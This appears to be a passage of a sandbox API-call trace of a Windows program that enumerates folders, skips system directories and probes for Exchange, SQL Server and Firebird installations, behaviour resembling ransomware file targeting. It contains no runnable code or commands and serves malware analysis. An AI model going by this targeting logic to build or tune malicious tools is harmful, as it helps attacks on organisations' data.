MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 46 [0103.862] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.862] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=15, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0103.862] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.862] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0103.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=11, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0103.863] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.863] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.863] GlobalUnlock (hMem=0x45000c) returned 0 [0103.863] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.863] GlobalLock (hMem=0x450004) returned 0x588000 [0103.863] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.863] GlobalUnlock (hMem=0x45000c) returned 0 [0103.863] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.863] GlobalUnlock (hMem=0x450004) returned 0 [0103.863] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.863] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=15, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0103.863] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.863] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=11, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0103.864] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0103.864] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=18, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 18 [0103.864] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 28 [0103.865] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=10, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 10 [0103.865] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=8, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 8 [0103.865] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0103.866] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.866] SHGetMalloc (in: ppMalloc=0x18f44c | out: ppMalloc=0x18f44c*=0x767666bc) returned 0x0 [0103.866] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f448 | out: ppidl=0x18f448) returned 0x0 [0103.866] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.867] SysReAllocStringLen (in: pbstr=0x18f4d0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f4d0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.867] IMalloc:Free (This=0x767666bc, pv=0x578208) [0103.867] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0103.867] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0103.868] GlobalLock (hMem=0x450004) returned 0x570108 [0103.868] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.868] GlobalUnlock (hMem=0x450004) returned 0 [0103.868] GlobalLock (hMem=0x450004) returned 0x570108 [0103.868] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.868] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.868] GlobalUnlock (hMem=0x450004) returned 0 [0103.868] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.868] GlobalUnlock (hMem=0x45000c) returned 0 [0103.868] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*.*", lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577e88 [0103.868] FindNextFileW (in: hFindFile=0x577e88, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.868] FindNextFileW (in: hFindFile=0x577e88, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0103.868] GetLastError () returned 0x12 [0103.868] FindClose (in: hFindFile=0x577e88 | out: hFindFile=0x577e88) returned 1 [0103.869] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.869] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.869] GlobalUnlock (hMem=0x45000c) returned 0 [0103.869] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.869] GlobalLock (hMem=0x450004) returned 0x588000 [0103.869] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.869] GlobalUnlock (hMem=0x45000c) returned 0 [0103.869] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.869] GlobalUnlock (hMem=0x450004) returned 0 [0103.869] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*.*", lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577e88 [0103.869] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f448 | out: lpLocalFileTime=0x18f448) returned 1 [0103.869] FileTimeToDosDateTime (in: lpFileTime=0x18f448, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0103.869] GlobalLock (hMem=0x450004) returned 0x570108 [0103.869] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.869] GlobalUnlock (hMem=0x450004) returned 0 [0103.870] GlobalLock (hMem=0x450004) returned 0x570108 [0103.870] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.870] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.870] GlobalUnlock (hMem=0x450004) returned 0 [0103.870] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.870] GlobalUnlock (hMem=0x45000c) returned 0 [0103.870] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.870] FindNextFileW (in: hFindFile=0x577e88, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.870] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0103.872] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0103.872] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.872] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.872] GlobalUnlock (hMem=0x45000c) returned 0 [0103.872] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.872] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.872] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.873] GlobalUnlock (hMem=0x45000c) returned 0 [0103.873] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.873] GlobalUnlock (hMem=0x450004) returned 0 [0103.873] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.873] FindNextFileW (in: hFindFile=0x577e88, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0103.873] GetLastError () returned 0x12 [0103.873] FindClose (in: hFindFile=0x577e88 | out: hFindFile=0x577e88) returned 1 [0103.873] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0103.873] GetLastError () returned 0x12 [0103.873] FindClose (in: hFindFile=0x577df0 | out: hFindFile=0x577df0) returned 1 [0103.874] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0103.874] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac4 | out: lpLocalFileTime=0x18fac4) returned 1 [0103.874] FileTimeToDosDateTime (in: lpFileTime=0x18fac4, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.874] GlobalLock (hMem=0x450004) returned 0x588000 [0103.874] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.874] GlobalUnlock (hMem=0x450004) returned 0 [0103.874] GlobalLock (hMem=0x450004) returned 0x588000 [0103.874] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.874] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.874] GlobalUnlock (hMem=0x450004) returned 0 [0103.874] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.874] GlobalUnlock (hMem=0x45000c) returned 0 [0103.874] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.875] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.875] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.875] GlobalUnlock (hMem=0x45000c) returned 0 [0103.875] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.875] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.875] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.875] GlobalUnlock (hMem=0x45000c) returned 0 [0103.875] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.875] GlobalUnlock (hMem=0x450004) returned 0 [0103.875] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.875] SysReAllocStringLen (in: pbstr=0x18fac4*=0x0, psz="C:\\Program Files", len=0x10 | out: pbstr=0x18fac4*="C:\\Program Files") returned 1 [0103.875] GlobalLock (hMem=0x450004) returned 0x588000 [0103.875] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.875] GlobalUnlock (hMem=0x450004) returned 0 [0103.875] GlobalLock (hMem=0x450004) returned 0x588000 [0103.876] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.876] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.876] GlobalUnlock (hMem=0x450004) returned 0 [0103.876] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.876] GlobalUnlock (hMem=0x45000c) returned 0 [0103.876] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft\\Exchange Server", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="䱈@網X綆X企@\x18㵤V頻\x18\x1b")) returned 0xffffffff [0103.876] GetLastError () returned 0x3 [0103.876] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0103.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\\x18\x18?眔") returned 21 [0103.877] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="㷴V䱠@絤X企@\x18㮴V頻\x181")) returned 0xffffffff [0103.877] GetLastError () returned 0x2 [0103.877] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0103.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\\x18\x18?眔") returned 9 [0103.878] FindFirstFileW (in: lpFileName="C:\\Program Files\\Firebird", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="㷴V䱠@㌤W企@\x18㢴X頻\x18;")) returned 0xffffffff [0103.878] GetLastError () returned 0x2 [0103.878] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0103.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\\x18\x18?眔") returned 8 [0103.879] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSSQL.1", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="㷴V䱠@㵤V企@\x18㤬X頻\x18D")) returned 0xffffffff [0103.879] GetLastError () returned 0x2 [0103.879] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0103.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0103.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\\x18\x18?眔") returned 37 [0103.879] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 0x577e78 [0103.879] FileTimeToLocalFileTime (in: lpFileTime=0x18f554, lpLocalFileTime=0x18f4d4 | out: lpLocalFileTime=0x18f4d4) returned 1 [0103.880] FileTimeToDosDateTime (in: lpFileTime=0x18f4d4, lpFatDate=0x18f522, lpFatTime=0x18f520 | out: lpFatDate=0x18f522, lpFatTime=0x18f520) returned 1 [0103.880] FindClose (in: hFindFile=0x577e78 | out: hFindFile=0x577e78) returned 1 [0103.880] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\\x18\x18?眔") returned 37 [0103.880] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.880] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.880] GlobalUnlock (hMem=0x45000c) returned 0 [0103.880] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.880] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.880] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.880] GlobalUnlock (hMem=0x45000c) returned 0 [0103.880] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.880] GlobalUnlock (hMem=0x450004) returned 0 [0103.880] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.881] SysReAllocStringLen (in: pbstr=0x18f790*=0x0, psz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", len=0x36 | out: pbstr=0x18f790*="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned 1 [0103.881] GlobalLock (hMem=0x450004) returned 0x588000 [0103.881] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.881] GlobalUnlock (hMem=0x450004) returned 0 [0103.881] GlobalLock (hMem=0x450004) returned 0x588000 [0103.881] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.881] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.881] GlobalUnlock (hMem=0x450004) returned 0 [0103.881] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.881] GlobalUnlock (hMem=0x45000c) returned 0 [0103.881] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Microsoft\\Exchange Server", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="䱈@巼W巐W企@\x18㵤V\x18\x1b")) returned 0xffffffff [0103.881] GetLastError () returned 0x3 [0103.882] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=21, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\tion\\") returned 21 [0103.882] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Microsoft SQL Server", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@嵤W企@\x18깬V\x181")) returned 0xffffffff [0103.882] GetLastError () returned 0x2 [0103.883] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=9, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\tion\\") returned 9 [0103.883] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Firebird", lpFindFileData=0x18f20c | out: 